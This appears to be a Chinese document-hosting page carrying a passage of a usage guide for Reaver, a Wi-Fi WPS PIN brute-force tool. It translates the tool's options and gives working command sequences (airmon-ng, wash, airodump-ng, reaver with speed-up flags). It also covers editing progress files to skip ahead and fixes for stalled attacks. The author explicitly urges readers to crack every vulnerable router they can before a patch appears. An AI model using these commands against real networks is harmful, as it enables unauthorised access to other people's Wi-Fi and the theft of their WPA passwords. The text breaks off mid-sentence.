Reaver_参数解析.doc

上传人：清*** IP属地：河南上传时间：2020-03-20 格式：DOC 页数：11 大小：94KB 积分：12 举报 版权申诉

已阅读5页，还剩6页未读，继续免费阅读

版权说明：本文档由用户提供并上传，收益归属内容提供方，若内容存在侵权，请进行举报或认领

文档简介

Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner Required Argument（必需参数）： -i, -interface= Name of the monitor-mode interface to use 网卡的监视接口，通常是mon0 -b, -bssid= BSSID of the target AP AP的MAC地址Optional Arguments（可选参数）： -m, -mac= MAC of the host system 指定本机MAC地址，在AP有MAC过滤的时候需要使用 -e, -essid= ESSID of the target AP 路由器的ESSID，一般不用指定 -c, -channel=Set the 802.11 channel for the interface (implies -f) 信号的频道，如果不指定会自动扫描 -o, -out-file= Send output to a log file stdout 标准输出到文件 -s, -session= Restore a previous session file 恢复进程文件 -C, -exec= Execute the supplied command upon successful pin recovery pin成功后执行命令 -D, -daemonize Daemonize reaver 设置reaver成Daemon -a, -auto Auto detect the best advanced options for the target AP 对目标AP自动检测高级参数 -f, -fixed Disable channel hopping 禁止频道跳转 -5, -5ghz Use 5GHz 802.11 channels 使用5G频道 -v, -verbose Display non-critical warnings (-vv for more) 显示不重要警告信息 -vv 可以显示更多 -q, -quiet Only display critical messages 只显示关键信息 -h, -help Show help 显示帮助Advanced Options（进阶选项）: -p, -pin= Use the specified 4 or 8 digit WPS pin 指定4位或8位的WPS PIN值 -d, -delay= Set the delay between pin attempts 1 PIN间延时，默认1秒 -l, -lock-delay= Set the time to wait if the AP locks WPS pin attempts 60 AP锁定WPS后等待时间 -g, -max-attempts= Quit after num pin attempts 尝试最大pin次数后退出 -x, -fail-wait= Set the time to sleep after 10 unexpected failures 0 10次意外失败后等待时间，默认0秒 -r, -recurring-delay= Sleep for y seconds every x pin attempts 每x次pin后等待y秒 -t, -timeout= Set the receive timeout period 5 收包超时，默认5秒 -T, -m57-timeout= Set the M5/M7 timeout period 0.20 M5/M7超时，默认0.2秒 -A, -no-associateDo not associate with the AP (association must be done by another application) 不连入AP（连入过程必须有其他程序完成） -N, -no-nacks Do not send NACK messages when out of order packets are received 不发送NACK信息（如果一直pin不动，可以尝试这个参数） -S, -dh-small Use small DH keys to improve crack speed 使用小DH关键值提高速度（推荐使用） -L, -ignore-locks Ignore locked state reported by the target AP 忽略目标AP报告的锁定状态 -E, -eap-terminate Terminate each WPS session with an EAP FAIL packet 每当收到EAP失败包就终止WPS进程 -n, -nack Target AP always sends a NACK Auto 对目标AP总是发送NACK，默认自动 -w, -win7 Mimic a Windows 7 registrar False 模拟win7注册，默认关闭-个人心得-对一个ap刚开始pin的时候打开-vv参数，如果顺利，就中断，然后改成-v继续pin，反正进度是可以保存的reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S如果一直pin不动，尝试加-N参数reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -N空格-p 8位pin码。示例： -p 12345678里面的参数 -S 改成 -n ，最后加上 -p 0770开始pin Reaver基本命令参数 XiaoPanOS下：选择“终端”输入sudo thunar 这里是为了取得超级权限，选择系统文件-usr-local-ect-reaveifconfig a /确认你用哪一个网卡WLAN0或WLAN1airmon-ng start wlan0 /开启监听模式wash i mon0 C /查看开启wps的无线路由器airodump-ng mon0 /查看周边AP信息（抓包）reaver i mon0 b MAC a S vv d 3 t 3 /开始穷举PIN码reaver i mon0 b MAC a S vv d 0 /加快速度为1秒reaver i mon0 b MAC a S vv p xxxx /从前4位PIN码开始reave的进度表文件保存在:1.3版：/etc/reaver/MAC地址.wpc1.4版：/usr/local/etc/reaver/MAC地址.wpcCDliunx下：选择“终端”输入sudo thunar 这里是为了取得超级权限，选择系统文件-usr-local-ect-reaver-reaver必需的参数:-i, -interface=wlan Name of the monitor-mode interface to use /监视模式接口使用的名称-b, -bssid=mac BSSID of the target AP /目标AP的SSIDreaver可选参数:-m, -mac=mac MAC of the host system /主机系统的MAC-e, -essid=ssid ESSID of the target AP /目标AP的ESSID-c, -channel=channel Set the 802.11 channel for the interface (implies -f) /设置接口的802.11信道 (意味着 -f)-o, -out-file=file Send output to a log file stdout /输出发送到一个日志文件-s, -session=file Restore a previous session file /恢复以前的记录文件-C, -exec=command Execute the supplied command upon successful pin recovery /所提供的命令执行成功后，pin 恢复-D, -daemonize Daemonize reaver /守护进程 reaver-a, -auto Auto detect the best advanced options for the target AP /自动检测目标AP的最先进的选项-f, -fixed Disable channel hopping /禁用信道跳频-5, -5ghz Use 5GHz 802.11 channels /使用5GHz的802.11信道-v, -verbose Display non-critical warnings (-vv for more) /显示非关键的警告（- VV更多）-q, -quiet Only display critical messages /仅显示重要消息-h, -help Show help /显示帮助reaver高级选项：-p, -pin=wps pin Use the specified 4 or 8 digit WPS pin /使用指定的4个或8个的 pin WPS-d, -delay=seconds Set the delay between pin attempts 1 /设置pin尝试之间的延迟1-l, -lock-delay=seconds Set the time to wait if the AP locks WPS pin attempts 60 /设置等待的时间，如果AP锁定WPS PIN尝试60-g, -max-attempts=num Quit after num pin attempts /退出后NUM pin尝试-x, -fail-wait=seconds Set the time to sleep after 10 unexpected failures 0 /设定时间后进入休眠100意外故障-r, -recurring-delay=xy Sleep for y seconds every x pin attempts /对每一个pin码尝试Y秒-t, -timeout=seconds Set the receive timeout period 5 /设置接收超时时间5-T, -m57-timeout=seconds Set the M5M7 timeout period 0.20 /设置M5M7超时期0.20-A, -no-associate Do not associate with the AP (association must be done by another application) /不要与AP关联（协会必须由另一个应用程序进行）-N, -no-nacks Do not send NACK messages when out of order packets are received /不要发送NACK消息收到时，为了包出-S, -dh-small Use small DH keys to improve crack speed /使用小DH密钥，以提高PJ速度-L, -ignore-locks Ignore locked state reported by the target AP /忽略锁定状态的目标AP-E, -eap-terminate Terminate each WPS session with an EAP FAIL packet /终止每一个EAP失败包WPS的记录-n, -nack Target AP always sends a NACK Auto /目标AP发送一个NACK自动-w, -win7 Mimic a Windows 7 registrar False /模仿Windows 7的注册处处长虚假 reaver 使用方法和技巧:reaver使用方法:reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -c 频道-i 监听后接口名称-b 目标mac地址-a 自动检测目标AP最佳配置-S 使用最小的DH key，可以提高PJ速度-vv 显示更多的非严重警告-d 即delay每穷举一次的闲置时间预设为1秒-c 频道-p PIN码四位或八位/可以用8位直接找到密码。当出现有百分数时你就可以用crtl+c来暂停，它会将reaver的进度表文件保存在1.3版：/etc/reaver/MAC地址.wpc1.4版：/usr/local/etc/reaver/MAC地址.wpc (tmp/minidwep/MAC地址.wpc) 用资源管理器，手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中，下次重启动后，再手工复制到/etc/reaver/ 目录下即可。注意需要取得ROOT权限,才可将wpc文件复制到/etc/reaver/ 目录下: 在终端模拟里面输入:SUDO SUSUDO THUNAR reaver使用技巧:1、将mac地址.wpc 备份后，下次可以继续使用。2、程序默认每尝试后停止一秒，加入-d0参数使之不停止：reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -d03、-p参数：-p PIN可以让你在获取到PIN的情况下直接得到路由WPA密码！reaver-i mon0 -b MAC -p PIN4、wpc结构0 /这个地方是说它的前4位PIN码的进度位置数，真实位置要+40 /这个地方是说后3位PIN数的已经运行测试位置数0 /0时没有找到，当为1时找到前四位，当为2时全部找到。下面是1万个前四位数（reaver1.3版4位随机数，1.4版是升序）第4行起00000001.9999 下面是1千个三位数（PIN第八位数是验证码）从1004行起000.999 所以前四位很重要，将已经知道的前四位放在最前面会提高你的PIN速度，我们也可以手动修改wpc文件第一行，如我们要从3000开始pin你可以将它修改为3004,这样它就会从3000开始PIN了。当我们在PIN时就可以不用保存虚拟机快照了，只要你记住了前四位，你下载用软件修改WPC文件就可了。cdlinux对wpc文件最方便，beini和xiaopan对wpc修改要用命令vi来修改，vi的使用方法很简单viXXXX.wpc打开就可以了，输入i进行编辑，输入escap退回命令模式，输入:wq退出保存。 Pin码重复出现死循环解决之道:1.xiaopanOS环境解决之道：当你看到PIN到一定程度，窗口里的PIN码不变、进度百分比也不走，那么，保持原窗口不变，再点击ROOTSHELL图标，新开一个PIN窗口，输入 “reaver -i mon0 -b （正在PIN的目标MAC） -a -s -vv ”(注意：这里“S”要小写) 那么，你就会发现原来PIN的窗口，PIN码开始改变，进度开始前进了！而且PIN的时间也大为缩短了！如果是破解到99.99%，执行此部操作就马上弹出正确的pin码和wifi密码，以及路由器的SSID。 2.CDlinux环境解决之道：当你看到PIN到一定程度，窗口里的PIN码不变、进度百分比也不走，那么，请Ctrl+C停止，然后点击Reaver按钮，在弹出的窗口中输入“-a -s vv“ (注意：这里“S”要小写) 那么，你就会发现原来PIN的窗口，PIN码开始改变，进度开始前进了！而且PIN的时间也大为缩短了！,如果是破解到99.99%，执行此部操作就马上弹出正确的pin码和wifi密码，以及路由器的SSID。若到90.9%或99.9%还是不出，也可以试试“reaver -i mon0 -b (正在PIN的目标MAC) -v -a -n -c”时间及经验总结，基本90.9%和99.9%的死循环，已经100%成功了，最后祝大家破解愉快！用Reaver pin码破特点：1、不需要客户端，2、有PIN码就能获得无线密码，3、八位数PIN码实际只有一万一千组随机密码，4、抓包、EWSA跑包，每个环节都有很大的不确定性。而PIN破密，只要开户WPS，破密只是个时间问题。提醒：大家还是早点都把能pin的路由都破了！可能马上就有安全补救方案出来了！到时候就没机会了，时不我待、只争朝夕！BT5、CDlinux、beini、xiaopan-OS都支持reaver运行。reaver使用方法、步骤：打开超级终端 root shell 如果电脑装有多个无线网卡，请先发指令ifconfig -a确认你用哪一个网卡WLAN0或WLAN1下面的指令都是以单一网卡WLAN0为例一、激活监听模式：airmon-ng start wlan0二、查看周边AP信息（抓包）：airodump-ng mon0观察要破AP的PWR信号强弱变化，注意同频干扰，调整网卡放置位置和角度、方向。PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)三、按Ctrl+C终止抓包四、抓PIN码： reaver -i mon0 -b MAC -vv例如：reaver -i mon0 -b C8:3A:35:F6:BB:B8 vv1.4版可用：reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v（可用一个v）注意，MAC中冒号不可省略，MAC地址的字母大小写均可， -vv是两个V不是W！reaver1.3感觉比1.4更稳定些。特别提示：只有AP开启了WPS、QSS功能，才可以用PIN法破PSK密码!如何查看AP是否开了WPS、QSS呢？一、使用指令: airodump -ng mon0MB一栏下，出现54e.（看清楚有点“.”）是开WPS的二、WIN7下，用通常的方式连接AP，如果在提示输入密码框下面，出现“通过按路由器按钮也可以连接”，就确认此AP开了WPS、QSS。但是，WIN7下不出现“通过按路由器按钮也可以连接”，不等于100%没开WPS。还是 54e. 准。AP关闭了WPS、或者没有QSS滴，会出现“WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)”PIN破密对信号要求极

人人文库> 全部分类> 教育资料 > 课件下载

温馨提示

1. 本站所有资源如无特殊说明，都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
2. 本站的文档不包含任何第三方提供的附件图纸等，如果需要附件，请联系上传者。文件的所有权益归上传用户所有。
3. 本站RAR压缩包中若带图纸，网页内容里面会有图纸预览，若没有图纸预览就没有图纸。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 人人文库网仅提供信息存储空间，仅对用户上传内容的表现方式做保护处理，对用户上传分享的文档内容本身不做任何修改或编辑，并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容，请与我们联系，我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

Reaver_参数解析.doc

文档简介

温馨提示

最新文档

评论

Reaver_参数解析.doc

文档简介

温馨提示

最新文档

评论

相关文档